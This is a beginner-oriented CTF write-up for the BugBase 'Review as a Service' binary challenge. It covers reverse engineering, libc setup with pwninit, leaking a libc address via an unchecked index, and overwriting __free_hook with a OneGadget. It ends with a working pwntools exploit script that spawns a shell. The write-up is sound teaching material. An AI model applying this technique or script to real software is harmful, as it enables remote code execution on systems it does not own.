BugBase - RaaS

A beginner-friendly introduction to heap-related CTF challenges.

Background

First of all, I don't usually post write-ups for CTF challenges because there's often an abundance of existing write-ups for the challenges I am capable of solving (i.e. the most easy ones).

However, after lots of CTFs having to skip the binary challenges that include a malloc and free because I wouldn't even know what to do with the libc DLL, during the BugBase CTF, I finally decided to take some time to learn about the heap and how to approach this sort of challenge.

In the end, I wasn't able to solve the challenge in time - and ironically, it's not even a heap exploitation - but I finally got around to learn the process of analysing this type of challenge.

And since that's something rarely found in any other writeup, I'll share all my steps here with the hope that it may prove useful to others.

Review as a Service (RaaS) - 250pts

Below you can find the challenge files (courtesy of the challenge author @J43G3R):

Getting Started

First things first, after running strings on the binary we'll simply execute it:

Well, that didn't print out a flag. Instead, it appears that we can enter some strings before being dropped into a typical menu that allows us to view, edit and delete those strings. Finally, we can also exit after entering another string and rating the service.

Okay, time to whip out our favourite decompiler or disassembler, whatever floats your boat, and statically analyse the code of this program. I'll be using Ghidra here.

Reverse Engineering

This write-up does not focus on reverse engineering, so I'll only highlight the interesting bits and pieces - the rest is left as an exercise for the reader.

After renaming and retyping some of the variables in the code, we can start to make sense of the variables that are placed on the stack during the main function. Ghidra displays them like this:

Note that Ghidra uses the annotation Stack[-0x38] to indicate the location of the variable right at the entry of the function. In this case, reviewPtrArray will be stored 56 (0x38) bytes below the stack pointer at the time of entering the main function. Keep in mind that the function starts by pushing the previous frame pointer onto the stack and uses the new stack pointer value as new frame pointer. This will be important later.

Should any of this sound weird to you, feel free to check out my Buffer Overflow article where I explain the 32bit stack in more detail. Here we are on a 64 bit system but the concepts remain the same.

Not wasting any time, I have marked three variables that may seem important to us: a string array that seems to store review pointers, a 32 character string that holds the product names and a final string called storeName. They are contiguous on the stack and should we be able to overflow one of them we might control the other.

Analyzing the first few lines, we find the loop that let's us add 4 reviews right at the start.

Okay, so the program is dynamically allocating 48 bytes for each review and stores the 4 names (each maximum 8 characters long) in the productNameArray filling out the 32 bytes we saw.

Next, we look at what we can do with the menu options. Here, two of them stand out:

Looking at menu option 1 (view), we can see that no index check is performed before our input is used to calculate the address of the string that will be printed out (right side, red box).

Now, being able to read memory potentially allows us to read addresses that will later help us to defeat ASLR. So we'll definitely keep that option in mind.

Option 2 (edit) looks almost identical to option 1. Only that here the index must be below 4 and instead of reading from the calculated address, we can write to it (read(0,<address>,8) reads 8 bytes from stdin and writes them to <address>).

Noticed how we can specify negative values for the reviewIndex? Basically, this enables us to write arbitrary 8 bytes to the memory below the productNameArray.

Well, what about the adjacent pointer, storeName? We saw that it's right below the productNameArray and if we pay attention to the last few lines of codes, we can see that we can extend that write to any address we want:

If we were to use menu option 2 to overwrite the storeName with an address, we could later use the line in the red box to write 8 bytes to that address, effectively allowing us to write 8 bytes to any address we want.

Initially, this is where I would get stuck because I was unsure where I should write what and how I could turn any of that into RCE. Additionally, I hadn't even touched the LIBC DLL yet, what's up with that? Let's get into that.

Exploitation

Alright, we've identified some flaws in the program - now let's get cracking. First of all, let's deal with the libc.so.6.

Setting up libc

Whenever you write and compile a C program, chances are you're using some existing functions like printf. But you've never defined that function yourself, have you? That's because it's part of the C standard library, short: libc. This library will be linked at runtime by a run time linker, basically loading the library dynamically into memory so that the program can access the library functions.

As with every other program and library, there are different versions and implementations of libc out there. So when the challenge author hands out a specific C library, it's safe to assume that we'll need that exact libc version/implementation for our exploit.

When we simply execute the binary, it automatically links against our installed standard library. In terms of functionality, this won't make a difference: malloc (also a libc function) will always reserve memory and printf will always print a string. But internal implementations and addresses of functions may very well differ.

Enough with the theory, what do we do with the library?

First of all, in order to analyse the binary together with the right library, we'd have to patch the binary to use a linker whose version matches the one of the library. Using strings, Google and patchelf that could be achieved manually. Then we could set the environment variable LD_PRELOAD to the location of our custom library and finally execute the program. One example for that process would be this (otherwise unrelated) writeup.

Fortunately, we don't have to do these steps manually, as there's a tool that does all of that for us. However, I thought it may be good to know what that tool actually does.

Introducing pwninit:

Either download a release binary or build the tool from source and you are ready to go. Place the two challenge files into the same directory, and simply call pwninit.

Though pwninit comes with lots of options and flags, simply calling it in the directory with the libc library and binary will do all the heavy lifting for us and create a new binary for us called RaaS_patched.

Now let's see what's different. When we execute the patched binary, everythings looks the same. But if we look at the memory mappings for the patched binary, we can see that now the custom libc is being used instead of the default one.

Feel free to compare the output of the patched binary with the output of the original binary.

You may ask yourself, why we would need to leak an address if /proc/<process pid>/maps shows all the addresses (we can see the heap, the libc and the stack). Try to restart the binary and view the memory mapping again - the addresses will change, the direct result of ASLR.

Okay fine, we have libc setup - what's next?

Leaking the libc base address

Since our final goal is remote code execution, we are looking for some way to redirect code execution and spawn a shell. However, we've seen that ASLR causes the address layout to be different each time, basically rendering hardcoded addresses useless.

If we could manage to extract any libc address from the program during runtime though, we could then simply work with offsets from that address to pinpoint gadgets and other useful locations in the library.

And that's exactly what we'll achieve with the vulnerability identified in the menu option 1. Quick recap, we can print a string value at any memory address from:

productNameArray + <input> * 8

If we remember Ghidra's variable output, we saw that productNameArray is at Stack[-0x58] (or directly in the assembler code: RBP-0x50). And if you know your C calling conventions, you'll remember what address should be stored directly above the RBP: the return address of the current function.

The main function in C is actually called by another function called __libc_start_main which, as you may have guessed, is a libc function. Hence, the return address of main will be an address pointing to the next assembler instruction after the callfrom within libc.

So, productNameArray + 11 * 8 should print the return address (11*8 = 88 = 0x58).

We can leak the return address with menu option 1 and entering 11 for the index.

We'll put together the exploit only in the end to save some time and space.

But how do we get the actual libc base address from only that address now? Let's use gdb.

First, we set a breakpoint in the main function and run the program. Immediately, we hit the breakpoint and look at the return address on the stack (RBP+8). That's the value we will leak with the menu option 1 later. We can then ask gdb to disassemble the code at that address and it turns out that we were right and the address does indeed belong to the function __libc_start_main.

Next, let's see the memory mapping of the program in gdb:

The libc is loaded into memory starting at address 0x7ffff7dd5000. The return address points to 0x7ffff7df9083. Therefore, subtracting the difference from the leaked address will give us the current libc base address. The difference is 7ffff7df9083 - 0x7ffff7dd5000 = 0x24083.

The offset from the leaked address to the libc base is 0x24083.

Alright, we got the libc base address, what now?

Overwriting `__free_hook`

As we've found out earlier, we can overwrite any address we want with 8 bytes.

One possible option is to overwrite a libc function hook. Basically, the libc version we're given provides several hooks that allow programmers to modify the behavior of existing functions. See this man page for more details. Note that these are deprecated in newer versions of libc.

One of these hooks is called __free_hook, a function pointer that will be accessed whenever free is called. And this is exactly what happens right before our program closes (free(storeName)).

In gdb we can use print $__free_hook to print the address of that value.

Using the determined libc base address, we can calculate the offset of __free_hook to the base with: 0x7ffff7fc3e48 - 0x7ffff7dd5000 = 0x1eee48.

The offset from the __free_hook to the libc base is 0x1eee48.

On to the final part, what are we going to write to that address?

Introducing OneGadget. In essence, OneGadget allows us to find sequences of useable assembler instructions that will do all the work for us and spawn a shell. This is possible, because the libc library may very well already contain code for this sort of action.

Once we installed it, we can run it on our given library:

OneGadget will display the offsets from the libc base and also show constraints for each gadget. So before we are going to use one of them, let's see which one matches all constraints.

For this purpose, we add a breakpoint right before the finalfree is executed and analyse the registers using gdb:

As we can see, r12 contains some value instead of NULL, meaning the constraints for the first gadget are not met. However, we fulfill the criteria for the other two gadgets, so let's try using the one-gadget with an offset of 0xe3b01.

Though 0xe3b04 appears to be a match as well, it did not work for me. So keep in mind to try different gadgets should the final shell fail (or dive deeper to reliably validate the constraints).

We've successfully identified a suitable one-gadget at offset 0xe3b01.

So the idea of our final exploit becomes:

Leaking an address from the stack to calculate the libc base address
Overwrite a pointer on the stack to point to the __free_hook pointer
With the final read operation we can write the address of a one-gadget to the __free_hook pointer
When the final free is called, execution will continue at the one-gadget and spawn a shell

Writing the exploit

This writeup focused on setting up and analyzing a binary challenge with a custom libc version. Writing the exploit is now just a matter of stitching all the pieces together using Python and pwntools.

#!/usr/bin/env python3

from pwn import *

LIBC_LEAK_OFFSET = 0x24083
FREE_HOOK_OFFSET = 0x1eee48
ONEGADGET_OFFSET = 0xe3b01

def view_review(p, id):
	p.recvuntil(b'choice>> ')
	p.send(b'1\n')
	p.recvuntil(b'[0-3]: ')
	p.send(str(id).encode() + b'\n')
	return u64(p.recvuntil(b'No such product')[15:21]+b'\x00\x00')

def edit_review(p, free_hook):
	p.recvuntil(b'choice>> ')
	p.send(b'2\n')
	p.recvuntil(b'[0-3]: ')
	p.send(b'-1\n')
	p.recvuntil(b'Review\n')
	p.send(b'1\n')
	p.recvuntil(b'name: ')
	p.send(free_hook)

def call_exit(p, one_gadget):
	p.recvuntil(b'choice>> ')
	p.send(b'4\n')
	p.recvuntil(b'store: ')
	p.send(one_gadget)
	p.recvuntil(b'[1-5]: ')
	p.send(b'5\n')

def main():
	p = process('./RaaS_patched')
	# in a CTF connect to the real target with remote(ip, port)

	for _ in range(4):
		p.recvuntil(b'review \n')
		p.send(b'a\n')
		p.recvuntil(b'name: ')
		p.send(b'b\n')

	# leak a libc address
	libc_leak = view_review(p, 11)

	# calculate real address
	libc_base = libc_leak - LIBC_LEAK_OFFSET
	free_hook = libc_base + FREE_HOOK_OFFSET
	onegadget = libc_base + ONEGADGET_OFFSET

	# write address of __free_hook to char *storeName
	edit_review(p, p64(free_hook))

	# write onegadget to __free_hook
	call_exit(p, p64(onegadget))

	# wait for shell
	p.interactive()

	p.close()

if __name__ == '__main__':
	main()

We've successfully exploited "Review as a Service" by leaking a libc address and overwriting the __free_hook, ultimately gaining RCE.

Final Thoughts

Alright , this concludes our journey into my first binary almost-heap challenge. In the end, we did not exploit the heap at all but I believe that the knowledge gained during this challenge can easily be transferred to get started with other binary and actual heap challenges. The setup and analyzing process remains mostly the same and knowledge of libc is generally required in order to understand and exploit the heap.

If you want to learn about the heap, I can recommend the Azeria Labs articles but as always there will be a lot of googling and stitching infomation together from various resources, such as my own heap layout infographic (shameless self plug).

Finally, I want to give a huge shoutout to the challenge author @J43G3R over at the BugBase discord, who supported me even after the CTF had ended by answering my questions and sharing his valuable knowledge!

If you got any feedback or questions, feel free to reach out via discord or smash one of the smiley faces below.

PreviousCVE-2022-45962 Postauth SQLI NextIntroduction

Last updated 2 years ago

Was this helpful?

Background

Review as a Service (RaaS) - 250pts

Getting Started

Reverse Engineering

Exploitation

Setting up libc

Leaking the libc base address

Overwriting __free_hook

Writing the exploit

Final Thoughts

Overwriting `__free_hook`